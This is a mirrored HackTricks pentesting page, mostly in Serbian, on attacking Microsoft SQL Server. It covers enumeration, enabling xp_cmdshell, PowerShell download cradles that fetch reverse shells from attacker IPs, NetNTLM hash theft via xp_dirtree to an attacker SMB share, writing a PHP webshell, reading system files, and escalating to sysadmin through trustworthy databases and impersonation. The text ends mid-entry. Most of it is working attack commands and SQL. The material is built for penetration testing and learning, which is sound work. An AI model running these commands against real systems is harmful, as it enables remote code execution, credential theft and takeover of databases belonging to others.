mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 08:30:57 +00:00
578 lines
29 KiB
Markdown
578 lines
29 KiB
Markdown
# 1433 - Pentesting MSSQL - Microsoft SQL Server
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
**Try Hard Security Group**
|
||
|
||
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||
|
||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||
|
||
***
|
||
|
||
## Osnovne informacije
|
||
|
||
Sa [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
|
||
|
||
> **Microsoft SQL Server** je **sistem za upravljanje relacionim bazama podataka** koji je razvio Microsoft. Kao server baze podataka, to je softverski proizvod čija je primarna funkcija skladištenje i preuzimanje podataka na zahtev drugih softverskih aplikacija—koje mogu raditi ili na istom računaru ili na drugom računaru preko mreže (uključujući Internet).\\
|
||
|
||
**Podrazumevani port:** 1433
|
||
```
|
||
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|
||
```
|
||
### **Podrazumevane MS-SQL sistemske tabele**
|
||
|
||
* **master Baza podataka**: Ova baza podataka je ključna jer beleži sve sistemske detalje za SQL Server instancu.
|
||
* **msdb Baza podataka**: SQL Server Agent koristi ovu bazu podataka za upravljanje rasporedom za alarme i poslove.
|
||
* **model Baza podataka**: Deluje kao plan za svaku novu bazu podataka na SQL Server instanci, gde se sve izmene poput veličine, kolacije, modela oporavka i još mnogo toga odražavaju u novokreiranim bazama podataka.
|
||
* **Resource Baza podataka**: Baza podataka samo za čitanje koja sadrži sistemske objekte koji dolaze sa SQL Server-om. Ovi objekti, iako su fizički smešteni u Resource bazi podataka, logički su predstavljeni u sys šemi svake baze podataka.
|
||
* **tempdb Baza podataka**: Služi kao privremeni prostor za skladištenje prolaznih objekata ili međurezultata.
|
||
|
||
## Enumeracija
|
||
|
||
### Automatska enumeracija
|
||
|
||
Ako ne znate ništa o usluzi:
|
||
```bash
|
||
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
|
||
msf> use auxiliary/scanner/mssql/mssql_ping
|
||
```
|
||
{% hint style="info" %}
|
||
Ako **nemate** **akreditive**, možete pokušati da ih pogodite. Možete koristiti nmap ili metasploit. Budite oprezni, možete **blokirati naloge** ako nekoliko puta zaredom ne uspete da se prijavite koristeći postojeće korisničko ime.
|
||
{% endhint %}
|
||
|
||
#### Metasploit (potrebni akreditivi)
|
||
```bash
|
||
#Set USERNAME, RHOSTS and PASSWORD
|
||
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
|
||
|
||
#Steal NTLM
|
||
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
|
||
|
||
#Info gathering
|
||
msf> use admin/mssql/mssql_enum #Security checks
|
||
msf> use admin/mssql/mssql_enum_domain_accounts
|
||
msf> use admin/mssql/mssql_enum_sql_logins
|
||
msf> use auxiliary/admin/mssql/mssql_findandsampledata
|
||
msf> use auxiliary/scanner/mssql/mssql_hashdump
|
||
msf> use auxiliary/scanner/mssql/mssql_schemadump
|
||
|
||
#Search for insteresting data
|
||
msf> use auxiliary/admin/mssql/mssql_findandsampledata
|
||
msf> use auxiliary/admin/mssql/mssql_idf
|
||
|
||
#Privesc
|
||
msf> use exploit/windows/mssql/mssql_linkcrawler
|
||
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
|
||
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
|
||
|
||
#Code execution
|
||
msf> use admin/mssql/mssql_exec #Execute commands
|
||
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
|
||
|
||
#Add new admin user from meterpreter session
|
||
msf> use windows/manage/mssql_local_auth_bypass
|
||
```
|
||
### [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#sql-server)
|
||
|
||
### Ručna enumeracija
|
||
|
||
#### Prijava
|
||
```bash
|
||
# Using Impacket mssqlclient.py
|
||
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
|
||
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
|
||
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
|
||
|
||
# Using sqsh
|
||
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
|
||
## In case Windows Auth using "." as domain name for local user
|
||
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
|
||
## In sqsh you need to use GO after writting the query to send it
|
||
1> select 1;
|
||
2> go
|
||
```
|
||
#### Uobičajena Enumeracija
|
||
```sql
|
||
# Get version
|
||
select @@version;
|
||
# Get user
|
||
select user_name();
|
||
# Get databases
|
||
SELECT name FROM master.dbo.sysdatabases;
|
||
# Use database
|
||
USE master
|
||
|
||
#Get table names
|
||
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
|
||
#List Linked Servers
|
||
EXEC sp_linkedservers
|
||
SELECT * FROM sys.servers;
|
||
#List users
|
||
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
|
||
#Create user with sysadmin privs
|
||
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
|
||
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
|
||
|
||
#Enumerate links
|
||
enum_links
|
||
#Use a link
|
||
use_link [NAME]
|
||
```
|
||
#### Dobij korisnika
|
||
|
||
{% content-ref url="types-of-mssql-users.md" %}
|
||
[types-of-mssql-users.md](types-of-mssql-users.md)
|
||
{% endcontent-ref %}
|
||
```sql
|
||
# Get all the users and roles
|
||
select * from sys.database_principals;
|
||
## This query filters a bit the results
|
||
select name,
|
||
create_date,
|
||
modify_date,
|
||
type_desc as type,
|
||
authentication_type_desc as authentication_type,
|
||
sid
|
||
from sys.database_principals
|
||
where type not in ('A', 'R')
|
||
order by name;
|
||
|
||
## Both of these select all the users of the current database (not the server).
|
||
## Interesting when you cannot acces the table sys.database_principals
|
||
EXEC sp_helpuser
|
||
SELECT * FROM sysusers
|
||
```
|
||
#### Dobijanje dozvola
|
||
|
||
1. **Securable:** Definisano kao resursi kojima upravlja SQL Server za kontrolu pristupa. Ovi su kategorizovani u:
|
||
* **Server** – Primeri uključuju baze podataka, prijave, krajnje tačke, grupe dostupnosti i server uloge.
|
||
* **Database** – Primeri obuhvataju uloge baze podataka, aplikacione uloge, šeme, sertifikate, kataloge punog teksta i korisnike.
|
||
* **Schema** – Uključuje tabele, prikaze, procedure, funkcije, sinonime itd.
|
||
2. **Permission:** Povezane sa SQL Server securables, dozvole kao što su ALTER, CONTROL i CREATE mogu se dodeliti principalu. Upravljanje dozvolama se vrši na dva nivoa:
|
||
* **Server Level** koristeći prijave
|
||
* **Database Level** koristeći korisnike
|
||
3. **Principal:** Ovaj termin se odnosi na entitet kojem je dodeljena dozvola za securable. Principali uglavnom uključuju prijave i korisnike baze podataka. Kontrola pristupa securables se vrši kroz dodeljivanje ili odbijanje dozvola ili uključivanjem prijava i korisnika u uloge opremljene pravima pristupa.
|
||
```sql
|
||
# Show all different securables names
|
||
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
|
||
# Show all possible permissions in MSSQL
|
||
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
|
||
# Get all my permissions over securable type SERVER
|
||
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
|
||
# Get all my permissions over a database
|
||
USE <database>
|
||
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
|
||
# Get members of the role "sysadmin"
|
||
Use master
|
||
EXEC sp_helpsrvrolemember 'sysadmin';
|
||
# Get if the current user is sysadmin
|
||
SELECT IS_SRVROLEMEMBER('sysadmin');
|
||
# Get users that can run xp_cmdshell
|
||
Use master
|
||
EXEC sp_helprotect 'xp_cmdshell'
|
||
```
|
||
## Tricks
|
||
|
||
### Execute OS Commands
|
||
|
||
{% hint style="danger" %}
|
||
Napomena da je za izvršavanje komandi neophodno ne samo da je **`xp_cmdshell`** **omogućena**, već i da imate **EXECUTE dozvolu na `xp_cmdshell` skladištenoj proceduri**. Možete saznati ko (osim sysadmin-a) može koristiti **`xp_cmdshell`** sa:
|
||
```sql
|
||
Use master
|
||
EXEC sp_helprotect 'xp_cmdshell'
|
||
```
|
||
{% endhint %}
|
||
```bash
|
||
# Username + Password + CMD command
|
||
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
|
||
# Username + Hash + PS command
|
||
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
|
||
|
||
# Check if xp_cmdshell is enabled
|
||
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
|
||
|
||
# This turns on advanced options and is needed to configure xp_cmdshell
|
||
sp_configure 'show advanced options', '1'
|
||
RECONFIGURE
|
||
#This enables xp_cmdshell
|
||
sp_configure 'xp_cmdshell', '1'
|
||
RECONFIGURE
|
||
|
||
#One liner
|
||
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
|
||
|
||
# Quickly check what the service account is via xp_cmdshell
|
||
EXEC master..xp_cmdshell 'whoami'
|
||
# Get Rev shell
|
||
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
|
||
|
||
# Bypass blackisted "EXEC xp_cmdshell"
|
||
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
|
||
```
|
||
### Ukradi NetNTLM hash / Relay napad
|
||
|
||
Trebalo bi da pokrenete **SMB server** da uhvatite hash koji se koristi u autentifikaciji (`impacket-smbserver` ili `responder` na primer).
|
||
```bash
|
||
xp_dirtree '\\<attacker_IP>\any\thing'
|
||
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
|
||
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
|
||
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'
|
||
|
||
# Capture hash
|
||
sudo responder -I tun0
|
||
sudo impacket-smbserver share ./ -smb2support
|
||
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
|
||
```
|
||
{% hint style="warning" %}
|
||
Možete proveriti ko (osim sysadmins) ima dozvole da pokreće te MSSQL funkcije sa:
|
||
```sql
|
||
Use master;
|
||
EXEC sp_helprotect 'xp_dirtree';
|
||
EXEC sp_helprotect 'xp_subdirs';
|
||
EXEC sp_helprotect 'xp_fileexist';
|
||
```
|
||
{% endhint %}
|
||
|
||
Korišćenjem alata kao što su **responder** ili **Inveigh** moguće je **ukrasti NetNTLM hash**.\
|
||
Možete videti kako koristiti ove alate u:
|
||
|
||
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
|
||
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||
{% endcontent-ref %}
|
||
|
||
### Zloupotreba MSSQL poverljivih veza
|
||
|
||
[**Pročitajte ovaj post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **da biste pronašli više informacija o tome kako zloupotrebiti ovu funkciju:**
|
||
|
||
{% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %}
|
||
[abusing-ad-mssql.md](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md)
|
||
{% endcontent-ref %}
|
||
|
||
### **Pisanje fajlova**
|
||
|
||
Da bismo pisali fajlove koristeći `MSSQL`, **moramo omogućiti** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), što zahteva administratorske privilegije, a zatim izvršiti neke sačuvane procedure za kreiranje fajla:
|
||
```bash
|
||
# Enable Ole Automation Procedures
|
||
sp_configure 'show advanced options', 1
|
||
RECONFIGURE
|
||
|
||
sp_configure 'Ole Automation Procedures', 1
|
||
RECONFIGURE
|
||
|
||
# Create a File
|
||
DECLARE @OLE INT
|
||
DECLARE @FileID INT
|
||
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
|
||
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
|
||
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
|
||
EXECUTE sp_OADestroy @FileID
|
||
EXECUTE sp_OADestroy @OLE
|
||
```
|
||
### **Čitanje datoteke sa** OPENROWSET
|
||
|
||
Podrazumevano, `MSSQL` omogućava čitanje datoteka **na bilo kojoj datoteci u operativnom sistemu na kojoj nalog ima pristup za čitanje**. Možemo koristiti sledeći SQL upit:
|
||
```sql
|
||
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
|
||
```
|
||
Međutim, **`BULK`** opcija zahteva **`ADMINISTER BULK OPERATIONS`** ili **`ADMINISTER DATABASE BULK OPERATIONS`** dozvolu.
|
||
```sql
|
||
# Check if you have it
|
||
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
|
||
```
|
||
#### Vektor zasnovan na grešci za SQLi:
|
||
```
|
||
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
|
||
```
|
||
### **RCE/Čitanje datoteka izvršavanjem skripti (Python i R)**
|
||
|
||
MSSQL može omogućiti izvršavanje **skripti u Pythonu i/ili R**. Ovi kodovi će biti izvršeni od strane **drugog korisnika** nego onog koji koristi **xp\_cmdshell** za izvršavanje komandi.
|
||
|
||
Primer pokušaja izvršavanja **'R'** _"Hellow World!"_ **ne radi**:
|
||
|
||
![](<../../.gitbook/assets/image (393).png>)
|
||
|
||
Primer korišćenja konfigurisanog Pythona za izvođenje nekoliko akcija:
|
||
```sql
|
||
# Print the user being used (and execute commands)
|
||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
|
||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
|
||
#Open and read a file
|
||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
|
||
#Multiline
|
||
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
|
||
import sys
|
||
print(sys.version)
|
||
'
|
||
GO
|
||
```
|
||
### Čitanje registra
|
||
|
||
Microsoft SQL Server pruža **više proširenih skladišnih procedura** koje vam omogućavaju da komunicirate ne samo sa mrežom već i sa datotečnim sistemom, pa čak i sa [**Windows registrom**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:**
|
||
|
||
| **Redovni** | **Svestan o instanci** |
|
||
| ---------------------------- | -------------------------------------- |
|
||
| sys.xp\_regread | sys.xp\_instance\_regread |
|
||
| sys.xp\_regenumvalues | sys.xp\_instance\_regenumvalues |
|
||
| sys.xp\_regenumkeys | sys.xp\_instance\_regenumkeys |
|
||
| sys.xp\_regwrite | sys.xp\_instance\_regwrite |
|
||
| sys.xp\_regdeletevalue | sys.xp\_instance\_regdeletevalue |
|
||
| sys.xp\_regdeletekey | sys.xp\_instance\_regdeletekey |
|
||
| sys.xp\_regaddmultistring | sys.xp\_instance\_regaddmultistring |
|
||
| sys.xp\_regremovemultistring | sys.xp\_instance\_regremovemultistring |
|
||
```sql
|
||
# Example read registry
|
||
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
|
||
# Example write and then read registry
|
||
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
|
||
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
|
||
# Example to check who can use these functions
|
||
Use master;
|
||
EXEC sp_helprotect 'xp_regread';
|
||
EXEC sp_helprotect 'xp_regwrite';
|
||
```
|
||
For **more examples** check out the [**original source**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
|
||
|
||
### RCE with MSSQL User Defined Function - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
|
||
|
||
Moguće je **učitati .NET dll unutar MSSQL sa prilagođenim funkcijama**. Ovo, međutim, **zahteva `dbo` pristup** tako da vam je potrebna veza sa bazom podataka **kao `sa` ili u ulozi Administratora**.
|
||
|
||
[**Following this link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) to see an example.
|
||
|
||
### Other ways for RCE
|
||
|
||
Postoje druge metode za dobijanje izvršenja komandi, kao što su dodavanje [proširenih skladištenih procedura](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), i [spoljašnjih skripti](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
|
||
|
||
## MSSQL Privilege Escalation
|
||
|
||
### From db\_owner to sysadmin
|
||
|
||
Ako **običan korisnik** dobije ulogu **`db_owner`** nad **bazom podataka koju poseduje admin** korisnik (kao što je **`sa`**) i ta baza podataka je konfigurisana kao **`trustworthy`**, taj korisnik može zloupotrebiti te privilegije za **privesc** jer **skladištene procedure** kreirane tamo mogu **izvršavati** kao vlasnik (**admin**).
|
||
```sql
|
||
# Get owners of databases
|
||
SELECT suser_sname(owner_sid) FROM sys.databases
|
||
|
||
# Find trustworthy databases
|
||
SELECT a.name,b.is_trustworthy_on
|
||
FROM master..sysdatabases as a
|
||
INNER JOIN sys.databases as b
|
||
ON a.name=b.name;
|
||
|
||
# Get roles over the selected database (look for your username as db_owner)
|
||
USE <trustworthy_db>
|
||
SELECT rp.name as database_role, mp.name as database_user
|
||
from sys.database_role_members drm
|
||
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
|
||
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
|
||
|
||
# If you found you are db_owner of a trustworthy database, you can privesc:
|
||
--1. Create a stored procedure to add your user to sysadmin role
|
||
USE <trustworthy_db>
|
||
|
||
CREATE PROCEDURE sp_elevate_me
|
||
WITH EXECUTE AS OWNER
|
||
AS
|
||
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'
|
||
|
||
--2. Execute stored procedure to get sysadmin role
|
||
USE <trustworthy_db>
|
||
EXEC sp_elevate_me
|
||
|
||
--3. Verify your user is a sysadmin
|
||
SELECT is_srvrolemember('sysadmin')
|
||
```
|
||
Možete koristiti **metasploit** modul:
|
||
```bash
|
||
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
|
||
```
|
||
Ili **PS** skripta:
|
||
```powershell
|
||
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
|
||
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
|
||
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184
|
||
```
|
||
### Improvizacija drugih korisnika
|
||
|
||
SQL Server ima posebnu dozvolu, nazvanu **`IMPERSONATE`**, koja **omogućava izvršnom korisniku da preuzme dozvole drugog korisnika** ili prijave dok se kontekst ne resetuje ili sesija ne završi.
|
||
```sql
|
||
# Find users you can impersonate
|
||
SELECT distinct b.name
|
||
FROM sys.server_permissions a
|
||
INNER JOIN sys.server_principals b
|
||
ON a.grantor_principal_id = b.principal_id
|
||
WHERE a.permission_name = 'IMPERSONATE'
|
||
# Check if the user "sa" or any other high privileged user is mentioned
|
||
|
||
# Impersonate sa user
|
||
EXECUTE AS LOGIN = 'sa'
|
||
SELECT SYSTEM_USER
|
||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||
|
||
# If you can't find any users, make sure to check for links
|
||
enum_links
|
||
# If there is a link of interest, re-run the above steps on each link
|
||
use_link [NAME]
|
||
```
|
||
{% hint style="info" %}
|
||
Ako možete da se pretvarate da ste korisnik, čak i ako on nije sysadmin, trebalo bi da proverite **da li korisnik ima pristup** drugim **baza podataka** ili povezanih servera.
|
||
{% endhint %}
|
||
|
||
Imajte na umu da kada postanete sysadmin, možete se pretvarati da ste bilo koji drugi:
|
||
```sql
|
||
-- Impersonate RegUser
|
||
EXECUTE AS LOGIN = 'RegUser'
|
||
-- Verify you are now running as the the MyUser4 login
|
||
SELECT SYSTEM_USER
|
||
SELECT IS_SRVROLEMEMBER('sysadmin')
|
||
-- Change back to sa
|
||
REVERT
|
||
```
|
||
Možete izvesti ovaj napad pomoću **metasploit** modula:
|
||
```bash
|
||
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
|
||
```
|
||
или са **PS** скриптом:
|
||
```powershell
|
||
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
|
||
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
|
||
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!
|
||
```
|
||
## Korišćenje MSSQL za postojanost
|
||
|
||
[https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/)
|
||
|
||
## Ekstrakcija lozinki iz SQL Server Linked Servers
|
||
|
||
Napadač može da ekstrakuje lozinke SQL Server Linked Servers iz SQL instanci i dobije ih u čistom tekstu, omogućavajući napadaču lozinke koje se mogu koristiti za sticanje veće kontrole nad metom. Skripta za ekstrakciju i dekripciju lozinki koje su sačuvane za Linked Servers može se pronaći [ovde](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords)
|
||
|
||
Neki zahtevi i konfiguracije moraju biti izvršeni kako bi ovaj exploit radio. Prvo, morate imati administratorska prava na mašini, ili mogućnost upravljanja SQL Server konfiguracijama.
|
||
|
||
Nakon što potvrdite svoja prava, potrebno je da konfigurišete tri stvari, a to su:
|
||
|
||
1. Omogućite TCP/IP na SQL Server instancama;
|
||
2. Dodajte Start Up parametar, u ovom slučaju, biće dodat trace flag, koji je -T7806.
|
||
3. Omogućite udaljenu administratorsku konekciju.
|
||
|
||
Da automatizujete ove konfiguracije, [ova repozitorija](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) ima potrebne skripte. Pored toga što ima powershell skriptu za svaki korak konfiguracije, repozitorija takođe ima kompletnu skriptu koja kombinuje skripte za konfiguraciju i ekstrakciju i dekripciju lozinki.
|
||
|
||
Za dodatne informacije, pogledajte sledeće linkove u vezi sa ovim napadom: [Dekripcija lozinki MSSQL baze podataka Link Server](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
|
||
|
||
[Troubleshooting SQL Server Dedicated Administrator Connection](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
|
||
|
||
## Lokalna eskalacija privilegija
|
||
|
||
Korisnik koji pokreće MSSQL server će imati omogućenu privilegiju tokena **SeImpersonatePrivilege.**\
|
||
Verovatno ćete moći da **eskalirate na Administratora** prateći jednu od ove 2 stranice:
|
||
|
||
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %}
|
||
[roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
|
||
{% endcontent-ref %}
|
||
|
||
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/juicypotato.md" %}
|
||
[juicypotato.md](../../windows-hardening/windows-local-privilege-escalation/juicypotato.md)
|
||
{% endcontent-ref %}
|
||
|
||
## Shodan
|
||
|
||
* `port:1433 !HTTP`
|
||
|
||
## Reference
|
||
|
||
* [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
|
||
* [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
|
||
* [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
|
||
* [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
|
||
* [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
|
||
* [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
|
||
* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) **Try Hard Security Group**
|
||
* [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
|
||
|
||
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||
|
||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||
|
||
***
|
||
|
||
## HackTricks Automatske Komande
|
||
```
|
||
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
|
||
Port_Number: 1433 #Comma separated if there is more than one.
|
||
Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out
|
||
|
||
Entry_1:
|
||
Name: Notes
|
||
Description: Notes for MSSQL
|
||
Note: |
|
||
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
|
||
|
||
#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
|
||
|
||
###the goal is to get xp_cmdshell working###
|
||
1. try and see if it works
|
||
xp_cmdshell `whoami`
|
||
go
|
||
|
||
2. try to turn component back on
|
||
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
|
||
reconfigure
|
||
go
|
||
xp_cmdshell `whoami`
|
||
go
|
||
|
||
3. 'advanced' turn it back on
|
||
EXEC SP_CONFIGURE 'show advanced options', 1
|
||
reconfigure
|
||
go
|
||
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
|
||
reconfigure
|
||
go
|
||
xp_cmdshell 'whoami'
|
||
go
|
||
|
||
|
||
|
||
|
||
xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"
|
||
|
||
|
||
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
|
||
|
||
Entry_2:
|
||
Name: Nmap for SQL
|
||
Description: Nmap with SQL Scripts
|
||
